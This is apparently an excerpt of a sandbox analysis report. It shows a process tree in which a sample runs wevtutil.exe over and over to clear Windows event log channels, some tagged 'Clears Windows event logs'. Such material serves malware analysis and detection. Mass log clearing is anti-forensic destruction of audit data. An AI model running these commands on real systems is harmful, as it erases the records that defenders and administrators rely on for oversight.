wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
3⤵
PID:1068

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
3⤵
PID:3504

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
3⤵
PID:4188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
3⤵
PID:3816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
3⤵
PID:1396

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
3⤵
PID:3972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
3⤵
PID:984

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
3⤵
PID:4896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
3⤵
PID:1320

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
3⤵
PID:4324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
3⤵
PID:288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
3⤵
PID:100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
3⤵
PID:1916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
3⤵
PID:1528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
3⤵
PID:2180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
3⤵
PID:1540

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D12/Analytic"
3⤵
PID:1452

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D12/Logging"
3⤵
PID:2776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D12/PerfTiming"
3⤵
PID:4976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D9/Analytic"
3⤵
PID:3424

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3DShaderCache/Default"
3⤵
- Clears Windows event logs
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectComposition/Diagnostic"
3⤵
PID:2244

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectManipulation/Diagnostic"
3⤵
PID:1480

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
3⤵
PID:2568

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
3⤵
PID:1868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
3⤵
- Clears Windows event logs
PID:3436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
3⤵
PID:3456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
3⤵
PID:1844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
3⤵
PID:2664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dism-Api/Analytic"
3⤵
PID:2256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dism-Api/ExternalAnalytic"
3⤵
PID:2288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dism-Api/InternalAnalytic"
3⤵
PID:3664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dism-Cli/Analytic"
3⤵
- Clears Windows event logs
PID:1552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
3⤵
PID:3864

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
3⤵
PID:3884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
3⤵
PID:2988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
3⤵
PID:4504

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dot3MM/Diagnostic"
3⤵
PID:444

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
3⤵
PID:5024

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DucUpdateAgent/Operational"
3⤵
PID:3968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-API/Diagnostic"
3⤵
PID:2820

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-Core/Diagnostic"
3⤵
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-Dwm/Diagnostic"
3⤵
PID:4228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-Redir/Diagnostic"
3⤵
PID:4056

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-Udwm/Diagnostic"
3⤵
PID:3144

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl-Admin"
3⤵
PID:2808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl-Operational"
3⤵
PID:4084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Contention"
3⤵
- Clears Windows event logs
PID:3560

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
3⤵
PID:3752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
3⤵
PID:4092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Power"
3⤵
PID:3848

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
3⤵
PID:5096

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EDP-Application-Learning/Admin"
3⤵
PID:4532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EDP-Audit-Regular/Admin"
3⤵
PID:4836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EDP-Audit-TCB/Admin"
3⤵
PID:936

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
3⤵
PID:3960

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ESE/IODiagnose"
3⤵
PID:4916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ESE/Operational"
3⤵
PID:376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
3⤵
PID:2376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
3⤵
PID:4460

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
3⤵
PID:3384

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapMethods-RasChap/Operational"
3⤵
PID:4256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapMethods-RasTls/Operational"
3⤵
PID:1700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapMethods-Sim/Operational"
3⤵
PID:4376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapMethods-Ttls/Operational"
3⤵
PID:4864

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
3⤵
PID:4508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/EventLog"
3⤵
PID:3524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/Trace"
3⤵
PID:5052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EnhancedStorage-EhStorTcgDrv/Analytic"
3⤵
PID:4372

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
3⤵
PID:1132

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
3⤵
PID:4160

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
3⤵
PID:4576

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
3⤵
PID:4252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
3⤵
PID:1584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
3⤵
PID:4580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
3⤵
PID:4792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
3⤵
- Clears Windows event logs
PID:3052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
3⤵
PID:3020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
3⤵
PID:4844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Analytic"
3⤵
- Clears Windows event logs
PID:1188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Operational"
3⤵
- Clears Windows event logs
PID:3204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Analytic"
3⤵
PID:4920

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Debug"
3⤵
PID:1216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Analytic"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Debug"
3⤵
PID:3216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Analytic"
3⤵
PID:568

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Debug"
3⤵
PID:2528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/WHC"
3⤵
PID:2580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Analytic"
3⤵
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/BackupLog"
3⤵
PID:3536

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Debug"
3⤵
PID:2668

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Analytic"
3⤵
PID:4696

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Debug"
3⤵
PID:920

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Analytic"
3⤵
- Clears Windows event logs
PID:4676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Debug"
3⤵
PID:2556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Analytic"
3⤵
PID:1548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Debug"
3⤵
PID:3400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
3⤵
PID:4524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
3⤵
PID:4964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
3⤵
- Clears Windows event logs
PID:3552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
3⤵
PID:4392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
3⤵
PID:264

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GPIO-ClassExtension/Analytic"
3⤵
PID:2608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GenericRoaming/Admin"
3⤵
PID:284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
3⤵
PID:272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
3⤵
PID:528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
3⤵
PID:260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
3⤵
- Clears Windows event logs
PID:3448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
3⤵
PID:3272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HelloForBusiness/Operational"
3⤵
PID:1656

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Help/Operational"
3⤵
PID:364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
3⤵
PID:3668

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
3⤵
PID:1340

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
3⤵
PID:2252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
3⤵
PID:2324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
3⤵
PID:3748

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
3⤵
PID:4220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Analytic"
3⤵
PID:2568

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Operational"
3⤵
PID:1868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HttpService/Log"
3⤵
PID:3436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
3⤵
PID:3456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Admin"
3⤵
PID:1844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic"
3⤵
PID:2664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Debug"
3⤵
PID:2256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose"
3⤵
PID:2288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Operational"
3⤵
PID:3664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Admin"
3⤵
PID:1552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Analytic"
3⤵
PID:3864

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Operational"
3⤵
PID:4904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-NETVSC/Diagnostic"
3⤵
PID:4944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-VID-Admin"
3⤵
PID:3200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-VID-Analytic"
3⤵
PID:4164

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IE-SmartScreen"
3⤵
PID:1328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
3⤵
PID:5060

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
3⤵
PID:384

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-Broker/Analytic"
3⤵
PID:5020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-CandidateUI/Analytic"
3⤵
PID:5092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManager/Debug"
3⤵
PID:784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManagerUI/Analytic"
3⤵
- Clears Windows event logs
PID:1684

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPAPI/Analytic"
3⤵
PID:2344

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPLMP/Analytic"
3⤵
PID:4876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPPRED/Analytic"
3⤵
PID:4888

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPSetting/Analytic"
3⤵
PID:1420

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPTIP/Analytic"
3⤵
PID:1128

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-KRAPI/Analytic"
3⤵
PID:1256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-KRTIP/Analytic"
3⤵
PID:4428

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-OEDCompiler/Analytic"
3⤵
PID:3280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-TCCORE/Analytic"
3⤵
PID:2276

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-TCTIP/Analytic"
3⤵
PID:4652

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-TIP/Analytic"
3⤵
PID:4984

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPNAT/Diagnostic"
3⤵
PID:2152

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
3⤵
PID:5036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPxlatCfg/Debug"
3⤵
PID:3056

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPxlatCfg/Operational"
3⤵
PID:4184

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IdCtrls/Analytic"
3⤵
PID:2772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IdCtrls/Operational"
3⤵
PID:3548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IndirectDisplays-ClassExtension-Events/Diagnostic"
3⤵
PID:2492

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Input-HIDCLASS-Analytic"
3⤵
PID:1460

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-InputSwitch/Diagnostic"
3⤵
PID:4276

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
3⤵
PID:456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
3⤵
PID:4372

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-KdsSvc/Operational"
3⤵
- Clears Windows event logs
PID:1132

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kerberos/Operational"
3⤵
PID:4160

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
3⤵
PID:4576

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/General"
3⤵
PID:4252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/Performance"
3⤵
PID:1584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Analytic"
3⤵
PID:868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Debug"
3⤵
PID:4636

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Operational"
3⤵
PID:4496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
3⤵
PID:3020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Operational"
3⤵
PID:4844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
3⤵
PID:1188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
3⤵
PID:3204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
3⤵
PID:4920

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
3⤵
PID:3932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-IO/Operational"
3⤵
PID:2188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Interrupt-Steering/Diagnostic"
3⤵
- Clears Windows event logs
PID:4732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-IoTrace/Diagnostic"
3⤵
PID:640

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Analytic"
3⤵
PID:4320

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Operational"
3⤵
PID:1728

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
3⤵
PID:3128

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
3⤵
PID:3464

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Pdc/Diagnostic"
3⤵
PID:932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Pep/Diagnostic"
3⤵
PID:2444

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Boot Diagnostic"
3⤵
PID:1068

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration"
3⤵
PID:3672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration Diagnostic"
3⤵
PID:4628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Device Enumeration Diagnostic"
3⤵
PID:2088

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Diagnostic"
3⤵
PID:3756

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Watchdog"
3⤵
PID:3972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
3⤵
PID:2716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
3⤵
PID:4896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
3⤵
PID:1320

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
3⤵
PID:4324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
3⤵
PID:288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
3⤵
PID:100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
3⤵
PID:1916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Performance"
3⤵
PID:1528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Debug"
3⤵
- Clears Windows event logs
PID:2180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Diagnostic"
3⤵
PID:1540

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Operational"
3⤵
PID:1452

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
3⤵
PID:2776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
3⤵
PID:4976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
3⤵
PID:3468

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
3⤵
PID:1772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
3⤵
PID:4936

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
3⤵
PID:3680

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
3⤵
PID:4840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-XDV/Analytic"
3⤵
PID:1260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Admin"
3⤵
PID:1512

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Operational"
3⤵
PID:4236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Performance"
3⤵
PID:4752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
3⤵
PID:400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
3⤵
PID:624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
3⤵
PID:3684

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LSA/Diagnostic"
3⤵
PID:4024

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LSA/Operational"
3⤵
PID:3028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LSA/Performance"
3⤵
PID:4240

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
3⤵
- Clears Windows event logs
PID:3644

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
3⤵
PID:2988

